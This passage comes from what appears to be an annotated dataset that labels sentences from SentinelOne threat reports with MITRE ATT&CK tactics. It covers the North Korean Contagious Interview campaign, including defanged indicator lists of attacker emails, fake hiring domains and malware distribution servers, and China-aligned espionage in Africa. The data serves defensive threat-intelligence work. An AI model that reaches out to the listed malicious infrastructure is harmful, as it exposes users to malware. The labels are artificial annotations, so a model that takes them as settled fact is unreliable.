"58_SentinelOne_report", "page_number": 1, "sentence_id": 105, "context_before": "In addition to the actors behind the Contagious Interview campaign cluster, SentinelLABS has also observed other North Korean groups demonstrating interest in threat intelligence prior to the activities discussed in this post.", "sentence_text": "We suspect the actors aimed to gain insights into non-public CTI and defensive strategies.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1596", "name": "Search Open Technical Databases" } ], "procedure": "Gain insight into CTI and defensive strategies", "entities": [ { "text": " gain insights into non-public CTI and defensive strategies", "start": 30, "end": 89, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s106-8efd2c", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 106, "context_before": "We suspect the actors aimed to gain insights into non-public CTI and defensive strategies.", "sentence_text": "In this post, we disclose indicators and TTPs that enable the sustained tracking of the Contagious Interview threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s107-8f3dcb", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 107, "context_before": "In this post, we disclose indicators and TTPs that enable the sustained tracking of the Contagious Interview threat actors.", "sentence_text": "While we expect them to alter their methods as a result, the expanding scale and broad targeting of these operations suggests greater benefit in empowering the wider public to effectively defend than there is in hoarding actionable intelligence indefinitely.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s108-fdcf62", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 108, "context_before": "While we expect them to alter their methods as a result, the expanding scale and broad targeting of these operations suggests greater benefit in empowering the wider public to effectively defend than there is in hoarding actionable intelligence indefinitely.", "sentence_text": "SentinelLABS maintains other methods of tracking these evolving campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s109-1294bd", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 109, "context_before": "SentinelLABS maintains other methods of tracking these evolving campaigns.", "sentence_text": "Despite this, they continue to achieve a relatively high success rate in attracting job seekers through fraudulent employment offers and skill assessment tests.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Attracting job seekers", "entities": [ { "text": "attracting job seekers through fraudulent employment offers", "start": 73, "end": 132, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s110-6d12ea", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 110, "context_before": "Despite this, they continue to achieve a relatively high success rate in attracting job seekers through fraudulent employment offers and skill assessment tests.", "sentence_text": "Their operational strategy appears to prioritize promptly replacing infrastructure lost due to takedown efforts by service providers, using newly provisioned infrastructure to sustain their activity.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Using new infrastructure", "entities": [ { "text": "replacing infrastructure", "start": 58, "end": 82, "label": "Action" }, { "text": "using newly provisioned infrastructure to sustain their activity", "start": 134, "end": 198, "label": "Action" } ] }, { "uid": "sentinel-58_SentinelOne_report-p1-s111-94718b", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 111, "context_before": "Their operational strategy appears to prioritize promptly replacing infrastructure lost due to takedown efforts by service providers, using newly provisioned infrastructure to sustain their activity.", "sentence_text": "Therefore, a critical element in mitigating this threat is the human factor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s112-09f9cc", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 112, "context_before": "Therefore, a critical element in mitigating this threat is the human factor.", "sentence_text": "In addition, infrastructure service providers play an important role in disrupting Contagious Interview operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s113-d38f8b", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 113, "context_before": "In addition, infrastructure service providers play an important role in disrupting Contagious Interview operations.", "sentence_text": "Continuous and effective actions against the threat actors’ infrastructure can significantly reduce their capacity to carry out attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s114-44cb29", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 114, "context_before": "Continuous and effective actions against the threat actors’ infrastructure can significantly reduce their capacity to carry out attacks.", "sentence_text": "Close collaboration and coordination between service providers and the threat intelligence community are crucial to mitigating the impact of these activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s115-ead88a", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 115, "context_before": "Close collaboration and coordination between service providers and the threat intelligence community are crucial to mitigating the impact of these activities.", "sentence_text": "SentinelLABS and Validin remain committed to sharing timely and actionable threat intelligence to support these collaborative efforts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s116-c47429", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 116, "context_before": "SentinelLABS and Validin remain committed to sharing timely and actionable threat intelligence to support these collaborative efforts.", "sentence_text": "Indicators of Compromise admin[@]quickproassess[.]com awesomium430[@]gmail.com betosoto2819[@]gmail.com brooksliam534[@]gmail.com chris[@]wegrowup[.]us daisukeokitsugu[@]gmail.com denys[@]gmail.com designedcuratedamy58[@]gmail.com dzsignzdcuatzdamy[@]gmail.com eliteengineer0523[@]gmail.com excellentreporter321[@]gmail.com fairdev610[@]gmail.com ghostmaxim777[@]outlook.com hundredup2023[@]gmail.com huzqur023[@]gmail.com info[@]versusx[.]us invite[@]quiz-nest[.]com jimmr6587[@]gmail.com johnkane84830[@]gmail.com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s117-db82c4", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 117, "context_before": "Indicators of Compromise admin[@]quickproassess[.]com awesomium430[@]gmail.com betosoto2819[@]gmail.com brooksliam534[@]gmail.com chris[@]wegrowup[.]us daisukeokitsugu[@]gmail.com denys[@]gmail.com designedcuratedamy58[@]gmail.com dzsignzdcuatzdamy[@]gmail.com eliteengineer0523[@]gmail.com excellentreporter321[@]gmail.com fairdev610[@]gmail.com ghostmaxim777[@]outlook.com hundredup2023[@]gmail.com huzqur023[@]gmail.com info[@]versusx[.]us invite[@]quiz-nest[.]com jimmr6587[@]gmail.com johnkane84830[@]gmail.com", "sentence_text": "legendaryaladdin[@]motionassess[.]com marvel714jm[@]gmail.com maxwell[@]gmail.com montessantiago9712[@]gmail.com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s118-1f5089", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 118, "context_before": "legendaryaladdin[@]motionassess[.]com marvel714jm[@]gmail.com maxwell[@]gmail.com montessantiago9712[@]gmail.com", "sentence_text": "mvsolution9[@]gmail.com phoenixfire471[@]gmail.com richardkdavis45[@]gmail.com rockstar96054[@]gmail.com rodriguezjamesdaniel0807[@]gmail.com rv882866.hstgr.cloud[@]glitchmedic[.]com sinbad[@]hirelytics360[.]com thedrgn1011[@]gmail.com trevorgreer9312[@]gmail.com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s119-28a812", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 119, "context_before": "mvsolution9[@]gmail.com phoenixfire471[@]gmail.com richardkdavis45[@]gmail.com rockstar96054[@]gmail.com rodriguezjamesdaniel0807[@]gmail.com rv882866.hstgr.cloud[@]glitchmedic[.]com sinbad[@]hirelytics360[.]com thedrgn1011[@]gmail.com trevorgreer9312[@]gmail.com", "sentence_text": "yudaiaoyama14[@]gmail.com IP Addresses Contagious Interview Domains careerquestion[.]com evaluateiq[.]com hirelytics360[.]com motionassess[.]com nvidia-release[.]us paxos-video-interview[.]com paxosassessments[.]com quickproassess[.]com quiz-nest[.]com robinhood[.]evalvidz[.]com skill-share[.]org skillcheck[.]pro skillmasteryhub[.]us skillquestions[.]com talentcheck[.]pro versusx[.]us vidassesspro[.]com VidHireHub[.]com webcamfixer[.]online willotalent[.]us ClickFix Malware Distribution Servers api.camdriverhelp[.]club api.drive-release[.]cloud api.release-drivers[.]online glitchmedic[.]com Domains Scouted by Contagious Interview Operators easyjobinterview[.]org hireassessment[.]com hiringassessment[.]com hiringassessment[.]net screenquestion[.]org SHA-1 Hashes DPRK Share Aleksandar Milenkoski Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s120-941b2d", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 120, "context_before": "yudaiaoyama14[@]gmail.com IP Addresses Contagious Interview Domains careerquestion[.]com evaluateiq[.]com hirelytics360[.]com motionassess[.]com nvidia-release[.]us paxos-video-interview[.]com paxosassessments[.]com quickproassess[.]com quiz-nest[.]com robinhood[.]evalvidz[.]com skill-share[.]org skillcheck[.]pro skillmasteryhub[.]us skillquestions[.]com talentcheck[.]pro versusx[.]us vidassesspro[.]com VidHireHub[.]com webcamfixer[.]online willotalent[.]us ClickFix Malware Distribution Servers api.camdriverhelp[.]club api.drive-release[.]cloud api.release-drivers[.]online glitchmedic[.]com Domains Scouted by Contagious Interview Operators easyjobinterview[.]org hireassessment[.]com hiringassessment[.]com hiringassessment[.]net screenquestion[.]org SHA-1 Hashes DPRK Share Aleksandar Milenkoski Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs.", "sentence_text": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s121-578b43", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 121, "context_before": "With expertise in malware research and focus on targeted attacks, he brings a blend of practical and deep insights to the forefront of cyber threat intelligence.", "sentence_text": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s122-dfa998", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 122, "context_before": "Aleksandar has a PhD in system security and is the author of numerous reports on cyberespionage and high-impact cybercriminal operations, conference talks, and peer-reviewed research papers.", "sentence_text": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s123-2018aa", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 123, "context_before": "From 2011 to 2014, he was a European Commission Marie Skłodowska-Curie Research Fellow.", "sentence_text": "Prev\nSmart Contract Scams | Ethereum Drainers Pose as Trading Bots to Steal Crypto", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s124-212436", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 124, "context_before": "Prev\nSmart Contract Scams | Ethereum Drainers Pose as Trading Bots to Steal Crypto", "sentence_text": "Next Prompts as Code & Embedded Keys | The Hunt for LLM-Enabled Malware Related Posts PhantomCaptcha | Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation October 22 2025 Top Tier Target | What It Takes to Defend a Cybersecurity Company from Today’s Adversaries April 28 2025 Ghostwriter | New Campaign Targets Ukrainian Government and Belarusian Opposition February 25 2025 [FILTERED_TABLES_START]\njimmr6587[@]gmail.com", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s133-de7c49", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 133, "context_before": "| Thomas Mitchell | Baymax | to find domain huzqur023[@]gmail.com | Hamza | Starlink", "sentence_text": "| I will use this for phishing check | info[@]versusx[.]us", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s158-13b5ca", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 158, "context_before": "| Rock Lee | FWW | Googling rockstar96054[@]gmail.com", "sentence_text": "| Googling 24042a8eea9b9c20af1f7bae00296b44968a068f | ContagiousDrop application (app.js)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-58_SentinelOne_report-p1-s159-5df732", "source": "sentinel", "doc_id": "58_SentinelOne_report", "page_number": 1, "sentence_id": 159, "context_before": "| Googling 24042a8eea9b9c20af1f7bae00296b44968a068f | ContagiousDrop application (app.js)", "sentence_text": "44ddabf5b5d601077936a130a2863a96d2af1c8e | ContagiousDrop application (app.js)\n4a8bfa28d46ae14e45a50e105e2d34f850ffa96c | ContagiousDrop application (app.js)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s1-8d6485", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "China’s engagement in soft power diplomacy has a lengthy history, yet the use of strategic cyber intrusions highlights recent objectives and potential lasting impact in Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s2-2771e4", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "China’s engagement in soft power diplomacy has a lengthy history, yet the use of strategic cyber intrusions highlights recent objectives and potential lasting impact in Africa.", "sentence_text": "To better manage the challenge of tracking state-aligned cyber activities in less monitored areas like Africa and Latin America, we are announcing the formation of the ‘ Undermonitored Regions Working Group ’.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s3-12f541", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "To better manage the challenge of tracking state-aligned cyber activities in less monitored areas like Africa and Latin America, we are announcing the formation of the ‘ Undermonitored Regions Working Group ’.", "sentence_text": "Launched today at LABScon , this effort calls upon established security researchers to join analytic capabilities, combine telemetry, resources, and local expertise, and promote a unified approach to analyzing cyber operations used to support soft power agendas in Africa and Latin America.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s4-f717cb", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "Launched today at LABScon , this effort calls upon established security researchers to join analytic capabilities, combine telemetry, resources, and local expertise, and promote a unified approach to analyzing cyber operations used to support soft power agendas in Africa and Latin America.", "sentence_text": "Introduction\nIn the evolving cyber threat landscape, it’s always important to constantly challenge our biases.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s5-35ba1a", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "Introduction\nIn the evolving cyber threat landscape, it’s always important to constantly challenge our biases.", "sentence_text": "There are large pockets of important threat activity occurring in regions around the world less commonly addressed in Western threat research.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s6-074b69", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "There are large pockets of important threat activity occurring in regions around the world less commonly addressed in Western threat research.", "sentence_text": "While much attention has rightfully been drawn to Chinese threat actors targeting the West, the broader set of global activity supporting and promoting similar interests remains opaque.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s7-9f0e43", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "While much attention has rightfully been drawn to Chinese threat actors targeting the West, the broader set of global activity supporting and promoting similar interests remains opaque.", "sentence_text": "At a time of pervasive foreign activities towards cornering natural resources and co-opting the governance of less represented countries, we have to ask– what is happening across the vast African continent?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s8-bfaa1e", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "At a time of pervasive foreign activities towards cornering natural resources and co-opting the governance of less represented countries, we have to ask– what is happening across the vast African continent?", "sentence_text": "In the threat intelligence industry, we have a habit of overlooking regions where our immediate financial interests don’t appear to be at stake.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s9-d6a547", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "In the threat intelligence industry, we have a habit of overlooking regions where our immediate financial interests don’t appear to be at stake.", "sentence_text": "Yet, it is precisely in places like Africa and Latin America that we witness these threat actors subtly shifting the balance of negotiations and playing pivotal roles in larger geopolitical strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s10-b6cb4d", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "Yet, it is precisely in places like Africa and Latin America that we witness these threat actors subtly shifting the balance of negotiations and playing pivotal roles in larger geopolitical strategies.", "sentence_text": "There’s an urgent need to acknowledge the importance of these frequently overlooked regions in the global threat landscape and take radical steps to close the gap in our situational awareness.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s11-6bfb14", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "There’s an urgent need to acknowledge the importance of these frequently overlooked regions in the global threat landscape and take radical steps to close the gap in our situational awareness.", "sentence_text": "These regions are shaping up to be the battlegrounds of the future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s12-ac4adb", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "These regions are shaping up to be the battlegrounds of the future.", "sentence_text": "Our focus is on incentivizing strategic intelligence on the state of cyber operations targeting Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s13-400736", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "Our focus is on incentivizing strategic intelligence on the state of cyber operations targeting Africa.", "sentence_text": "This is vital in understanding the PRC’s geostrategic ambitions and technological investments, and are fundamental in forging a forward-thinking and holistic defense approach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s14-921913", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "This is vital in understanding the PRC’s geostrategic ambitions and technological investments, and are fundamental in forging a forward-thinking and holistic defense approach.", "sentence_text": "We’ll highlight key examples including the targeting from Chinese state-sponsored APTs, such as Op.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s15-a245a2", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "We’ll highlight key examples including the targeting from Chinese state-sponsored APTs, such as Op.", "sentence_text": "Tainted Love and BackdoorDiplomacy, and how they blend into PRC’s soft power agenda across Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s16-cd803e", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "Tainted Love and BackdoorDiplomacy, and how they blend into PRC’s soft power agenda across Africa.", "sentence_text": "Background on Soft Power Engagement While cyber capabilities are important, they are just one of the more recent tools used in implementing broad national soft power strategies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s17-32b74d", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "Background on Soft Power Engagement While cyber capabilities are important, they are just one of the more recent tools used in implementing broad national soft power strategies.", "sentence_text": "The establishment of Confucius Institutes and expanding media investments have been a tool in crafting narratives that underline the positive aspects of its engagement in Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s18-bffedd", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "The establishment of Confucius Institutes and expanding media investments have been a tool in crafting narratives that underline the positive aspects of its engagement in Africa.", "sentence_text": "China has engaged in significant strategic investments in Africa, considered ‘debt-trap diplomacy’.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s19-04f97a", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "China has engaged in significant strategic investments in Africa, considered ‘debt-trap diplomacy’.", "sentence_text": "This refers to a scenario where a creditor country extends excessive credit to a debtor country with the presumed intention of extracting economic or political concessions when the debtor country cannot meet its repayment terms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s20-184b7f", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "This refers to a scenario where a creditor country extends excessive credit to a debtor country with the presumed intention of extracting economic or political concessions when the debtor country cannot meet its repayment terms.", "sentence_text": "Specifically in Africa, China has financed large critical infrastructure projects in many African countries .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s21-f99612", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "Specifically in Africa, China has financed large critical infrastructure projects in many African countries .", "sentence_text": "Countries pursuing economic and infrastructure development have found China a willing and eager investor over the last decade.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s22-578cb6", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "Countries pursuing economic and infrastructure development have found China a willing and eager investor over the last decade.", "sentence_text": "Future adverse effects are easily brushed aside by the immediate perceived benefits of these investments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s23-0f45f0", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "Future adverse effects are easily brushed aside by the immediate perceived benefits of these investments.", "sentence_text": "Offensive Cyber Operations as a Support Tool of Soft Power Agendas In recent years, we have tracked targeted intrusions against key industrial sectors in various African nations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s24-a9f80c", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "Offensive Cyber Operations as a Support Tool of Soft Power Agendas In recent years, we have tracked targeted intrusions against key industrial sectors in various African nations.", "sentence_text": "Three significant sets of activity best exemplify this dynamic across the larger set of China-aligned activity in Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s25-fa4ac5", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "Three significant sets of activity best exemplify this dynamic across the larger set of China-aligned activity in Africa.", "sentence_text": "Operation Tainted Love", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s26-06f890", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "Operation Tainted Love", "sentence_text": "This discovery marked an evolution of the toolkit involved in Operation Soft Cell , forging immediate connections to previous China-attributed activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s27-cc9851", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "This discovery marked an evolution of the toolkit involved in Operation Soft Cell , forging immediate connections to previous China-attributed activities.", "sentence_text": "Unnoted in our initial report, we identified the compromise of a telecommunications entity based in North Africa by the same threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s28-136817", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "Unnoted in our initial report, we identified the compromise of a telecommunications entity based in North Africa by the same threat actor.", "sentence_text": "The timing of this activity aligned closely with Chinese telecommunication soft power interests in Africa, as the organization was in private negotiations for further regional expansion in areas.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s29-bb5f41", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "The timing of this activity aligned closely with Chinese telecommunication soft power interests in Africa, as the organization was in private negotiations for further regional expansion in areas.", "sentence_text": "Strategic objectives in such intrusions highlight interest from China in internal business knowledge on negotiations, providing competitive advantage, or prepositioning for retained technical access for intelligence collection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s30-cf1312", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "Strategic objectives in such intrusions highlight interest from China in internal business knowledge on negotiations, providing competitive advantage, or prepositioning for retained technical access for intelligence collection.", "sentence_text": "Backdoor Diplomacy\nFor several years, another APT primarily referred to as BackdoorDiplomacy has operated across Africa.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s31-8928e6", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "Backdoor Diplomacy\nFor several years, another APT primarily referred to as BackdoorDiplomacy has operated across Africa.", "sentence_text": "Recently, fresh revelations emerged spotlighting the group’s sustained three-year endeavor targeting governmental organizations in Kenya.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s32-5811f1", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Recently, fresh revelations emerged spotlighting the group’s sustained three-year endeavor targeting governmental organizations in Kenya.", "sentence_text": "BackdoorDiplomacy seemingly concentrates efforts on government entities, along with high-priority telecommunications and finance organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s33-05d31d", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "BackdoorDiplomacy seemingly concentrates efforts on government entities, along with high-priority telecommunications and finance organizations.", "sentence_text": "The group has orchestrated a series of notable espionage campaigns across Africa in recent years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s34-d15f40", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "The group has orchestrated a series of notable espionage campaigns across Africa in recent years.", "sentence_text": "Pinpointing precise clustering for these groups remains challenging due to a prevalence of shared technical resources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s35-82413c", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "Pinpointing precise clustering for these groups remains challenging due to a prevalence of shared technical resources.", "sentence_text": "However, TTPs and targeting objectives are somewhat related to the APT41 umbrella.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s36-4a0a5c", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "However, TTPs and targeting objectives are somewhat related to the APT41 umbrella.", "sentence_text": "In a separate case, Chinese espionage efforts against the African Union (AU) was allegedly discovered in 2017.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-59_SentinelOne_report-p1-s37-98344c", "source": "sentinel", "doc_id": "59_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "In a separate case, Chinese espionage efforts against the African Union (AU) was allegedly discovered in 2017.", "sentence_text": "Notably, the network infrastructure and services were reportedly Huawei technology since the 